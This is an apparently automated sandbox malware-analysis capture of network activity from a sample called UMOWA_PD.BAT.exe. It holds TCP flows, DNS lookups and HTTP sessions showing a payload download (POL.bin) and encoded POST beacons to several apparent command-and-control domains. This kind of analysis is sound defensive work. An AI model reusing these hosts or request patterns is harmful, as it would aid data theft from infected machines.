                                                                                  Sep 25, 2024 09:59:10.769541025 CEST4982580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:12.177884102 CEST4982580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:12.279786110 CEST80498253.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:12.512921095 CEST80498233.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:12.513180971 CEST4982380192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:13.195539951 CEST4982680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:13.297467947 CEST80498263.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:13.297666073 CEST4982680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:13.302844048 CEST4982680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:13.404808998 CEST80498263.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:13.409317017 CEST80498263.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:13.409343958 CEST80498263.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:13.409676075 CEST4982680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:13.411756039 CEST4982680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:13.413798094 CEST80498263.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:13.413906097 CEST4982680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:13.513504982 CEST80498263.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:18.428811073 CEST4982780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:18.530869007 CEST80498273.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:18.531099081 CEST4982780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:18.538786888 CEST4982780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:18.640675068 CEST80498273.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:18.642303944 CEST80498273.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:18.642540932 CEST4982780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:20.051211119 CEST4982780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:20.153021097 CEST80498273.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:21.068806887 CEST4982880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:21.170692921 CEST80498283.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:21.173469067 CEST4982880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:21.178606033 CEST4982880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:21.280580997 CEST80498283.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:21.282506943 CEST80498283.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:21.282686949 CEST4982880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:22.691201925 CEST4982880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:22.792951107 CEST80498283.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:23.709062099 CEST4982980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:23.811031103 CEST80498293.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:23.811191082 CEST4982980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:23.818974018 CEST4982980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:23.819021940 CEST4982980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:23.819073915 CEST4982980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:23.921127081 CEST80498293.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:23.921138048 CEST80498293.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:23.921149015 CEST80498293.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:23.921156883 CEST80498293.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:23.921164989 CEST80498293.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:23.921173096 CEST80498293.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:23.921180964 CEST80498293.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:23.922590971 CEST80498293.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:23.922771931 CEST4982980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:25.331268072 CEST4982980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:25.432961941 CEST80498293.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:26.348918915 CEST4983080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:26.450766087 CEST80498303.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:26.450974941 CEST4983080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:26.456190109 CEST4983080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:26.558038950 CEST80498303.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:29.490098953 CEST80498303.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:29.490113974 CEST80498303.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:29.490423918 CEST4983080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:29.492616892 CEST4983080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:29.497584105 CEST80498303.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:29.497831106 CEST4983080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:29.594747066 CEST80498303.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:34.503406048 CEST4983180192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:34.730941057 CEST804983184.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:34.731168032 CEST4983180192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:34.738835096 CEST4983180192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:34.966974974 CEST804983184.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:34.967156887 CEST804983184.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:37.268394947 CEST4983280192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:37.491766930 CEST804983284.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:37.491906881 CEST4983280192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:37.499583960 CEST4983280192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:37.722383022 CEST804983284.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:37.722481966 CEST804983284.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:40.033406973 CEST4983380192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:40.255845070 CEST804983384.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:40.256037951 CEST4983380192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:40.263812065 CEST4983380192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:40.263859034 CEST4983380192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:40.263911963 CEST4983380192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:40.487608910 CEST804983384.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:40.487624884 CEST804983384.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:42.782763958 CEST4983480192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:43.009485006 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.009648085 CEST4983480192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:43.014811039 CEST4983480192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:43.241451025 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.241939068 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.241961002 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.241986036 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.242016077 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.242028952 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.242041111 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.242265940 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.242280006 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.242290974 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.242353916 CEST4983480192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:43.242568016 CEST4983480192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:43.246181965 CEST4983480192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:43.473367929 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:53.264880896 CEST4983580192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:53.434907913 CEST804983554.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:53.435138941 CEST4983580192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:53.443715096 CEST4983580192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:53.613730907 CEST804983554.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:53.614177942 CEST804983554.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:53.614190102 CEST804983554.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:53.614469051 CEST4983580192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:54.949876070 CEST4983580192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:55.967379093 CEST4983680192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:56.137295008 CEST804983654.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:56.137501955 CEST4983680192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:56.145169973 CEST4983680192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:56.315192938 CEST804983654.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:56.315361977 CEST804983654.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:56.315474987 CEST804983654.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:56.315766096 CEST4983680192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:57.652481079 CEST4983680192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:58.669872046 CEST4983780192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:58.839178085 CEST804983754.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:58.839371920 CEST4983780192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:58.847220898 CEST4983780192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:58.847239017 CEST4983780192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:58.847286940 CEST4983780192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:59.016643047 CEST804983754.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:59.018191099 CEST804983754.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:59.018204927 CEST804983754.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:59.018217087 CEST804983754.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:59.018393040 CEST4983780192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 10:00:00.354845047 CEST4983780192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 10:00:01.372462034 CEST4983880192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 10:00:01.542368889 CEST804983854.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 10:00:01.542649031 CEST4983880192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 10:00:01.547859907 CEST4983880192.168.11.2054.67.87.110
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                  Sep 25, 2024 09:56:36.075088024 CEST1.1.1.1192.168.11.200x5943No error (0)www.typ67.toptyp67.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 25, 2024 09:56:36.075088024 CEST1.1.1.1192.168.11.200x5943No error (0)typ67.top38.47.207.146A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:56:50.749984026 CEST1.1.1.1192.168.11.200x6e7eNo error (0)www.greekhause.orggreekhause.orgCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 25, 2024 09:56:50.749984026 CEST1.1.1.1192.168.11.200x6e7eNo error (0)greekhause.org3.33.130.190A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:56:50.749984026 CEST1.1.1.1192.168.11.200x6e7eNo error (0)greekhause.org15.197.148.33A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:05.058903933 CEST1.1.1.1192.168.11.200x70bNo error (0)www.dorikis.online162.213.249.216A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:19.529452085 CEST1.1.1.1192.168.11.200xce86No error (0)www.platinumkitchens.infoplatinumkitchens.infoCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:19.529452085 CEST1.1.1.1192.168.11.200xce86No error (0)platinumkitchens.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:19.529452085 CEST1.1.1.1192.168.11.200xce86No error (0)platinumkitchens.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:32.815990925 CEST1.1.1.1192.168.11.200xab8bNo error (0)www.dhkatp.vipdhkatp.vipCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:32.815990925 CEST1.1.1.1192.168.11.200xab8bNo error (0)dhkatp.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:32.815990925 CEST1.1.1.1192.168.11.200xab8bNo error (0)dhkatp.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:46.157201052 CEST1.1.1.1192.168.11.200x93b5No error (0)www.tempatmudisini01.clicktempatmudisini01.clickCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:46.157201052 CEST1.1.1.1192.168.11.200x93b5No error (0)tempatmudisini01.click103.21.221.4A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:58:01.752358913 CEST1.1.1.1192.168.11.200x5c5fNo error (0)www.komart.shopkomart.shopCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 25, 2024 09:58:01.752358913 CEST1.1.1.1192.168.11.200x5c5fNo error (0)komart.shop133.130.35.90A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:58:16.110465050 CEST1.1.1.1192.168.11.200x623aNo error (0)www.dxeg.lola22.dxzz.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 25, 2024 09:58:16.110465050 CEST1.1.1.1192.168.11.200x623aNo error (0)a22.dxzz.topdxzz.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 25, 2024 09:58:16.110465050 CEST1.1.1.1192.168.11.200x623aNo error (0)dxzz.top137.175.33.56A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:58:29.864520073 CEST1.1.1.1192.168.11.200x521cNo error (0)www.tukaari.shoptukaari.shopCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 25, 2024 09:58:29.864520073 CEST1.1.1.1192.168.11.200x521cNo error (0)tukaari.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:58:29.864520073 CEST1.1.1.1192.168.11.200x521cNo error (0)tukaari.shop15.197.148.33A (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49755 | 185.86.211.137 | 80 | 2788 | C:\Users\user\Desktop\UMOWA_PD.BAT.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 09:54:23.896635056 CEST | 163 | OUT | GET /POL.bin HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                  Host: bestpack.ee
                                                                                  Cache-Control: no-cache
Sep 25, 2024 09:54:24.114934921 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Date: Wed, 25 Sep 2024 07:54:24 GMT
                                                                                  Server: Apache
                                                                                  Location: https://bestpack.ee/POL.bin
                                                                                  Content-Length: 235
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/POL.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49757 | 208.91.197.27 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 09:54:57.764991999 CEST | 548 | OUT | GET /ewr1/?Xb3xI=yez6Hf8Nj9Hz2QzY0/kGZkWHaPFJ5S6eHe7u1tM28nyQurG92QfHcGFdjgIUViF/gPksZ2ZTtaNFMQ6yCGD+tVTZAN9QT6lG744IlGnILDcgbby9ijaATPk=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.inastra.online
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Sep 25, 2024 09:55:03.457561970 CEST | 616 | IN | HTTP/1.1 200 OK
                                                                                  Date: Wed, 25 Sep 2024 07:54:57 GMT
                                                                                  Server: Apache
                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.20 | 49758 | 13.248.169.48 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 09:55:14.348584890 CEST | 813 | OUT | POST /tcs6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.invicta.world
                                                                                  Origin: http://www.invicta.world
                                                                                  Referer: http://www.invicta.world/tcs6/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=ZRDWWn0ISYUYYrhjm4+uDUd4Wwu6EqgWNuWenRpkC+GCNMykkhILHDN609TlAeQPh6ZiYgSNJ0lHblZ65Jte5HSqBAU19b0knXnzr+oxslc1gNlk5yt3Grl+rMwDl3J+pO+oz73gtxA+bL/7EB7gez0lm8OPn5+0eLrwavb68b8PlmVQRNIIcyab+iOS82jRsg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.11.20 | 49759 | 13.248.169.48 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 09:55:16.985219955 CEST | 833 | OUT | POST /tcs6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.invicta.world
                                                                                  Origin: http://www.invicta.world
                                                                                  Referer: http://www.invicta.world/tcs6/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=ZRDWWn0ISYUYKaRjlZ+uC0d7Vwu6NKgKNuaenQt0DMSCKsCklkkLKjN68dTkN+Rih6dAYkSNJ1BHbkp64+Zf4XSsMgUzir0knXnzr9UfslU1gdVkrWx2Y7lxhswDh3J6pO/9z/XOtzI+bP77AA7nHj0/scPchp74e/eNcI7x151ypQEKM/8sfhGp6S36+0iKxsiwan7/kiPcb+D37cN7Qfs=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.11.20 | 49760 | 13.248.169.48 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 09:55:19.625036955 CEST | 7982 | OUT | POST /tcs6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.invicta.world
                                                                                  Origin: http://www.invicta.world
                                                                                  Referer: http://www.invicta.world/tcs6/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.11.20 | 49761 | 13.248.169.48 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 09:55:22.264098883 CEST | 547 | OUT | GET /tcs6/?Xb3xI=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.invicta.world
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:55:22.369791985 CEST | 398 | IN | HTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 07:55:22 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Xb3xI=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&O4bP=9dRH6ZfHbJX"}</script></head></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  6 | 192.168.11.20 | 49762 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:55:27.670301914 CEST | 834 | OUT | POST /bqye/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.whats-in-the-box.org
                                                                                  Origin: http://www.whats-in-the-box.org
                                                                                  Referer: http://www.whats-in-the-box.org/bqye/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=lpp2G9wZJQS0MlGRsWnVtSTc2OoujJdPs8tz4LUGUp85oIUzzJPc9UtE5b8lPuD8o17QtYlE++WjwKPRiUfEquo18cEgU1V92kXxu1GTOWl92J6L1PWTNuBYn7CF/mK+e7ODitQZRyrUbupATCvQUVXxOygiWWoaTh4LlwSjp5OZPEzFJ4IImrhpwJOfHYP0cw==


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  7 | 192.168.11.20 | 49763 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:55:30.310297012 CEST | 854 | OUT | POST /bqye/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.whats-in-the-box.org
                                                                                  Origin: http://www.whats-in-the-box.org
                                                                                  Referer: http://www.whats-in-the-box.org/bqye/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=lpp2G9wZJQS0NGeRp1fVryTfzOouqpdLs8hz4KRDU7I5mNozyIPcx0tE378gLuDno1mvtYJE++CjwL/RllfDr+or08EibVV92kXxuxr+OW992ZmL1uWUT+BbzrCFu2L3e7OlioI/RwjUbsxASTvTBlX3Kyg1ZX1UfFN6lDvwjM2tDyifUK8sl49b0533FaOvB+LibGAb0RRM2eQXUgNkMv4=


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  8 | 192.168.11.20 | 49764 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:55:32.979851961 CEST | 6445 | OUT | POST /bqye/ HTTP/1.1
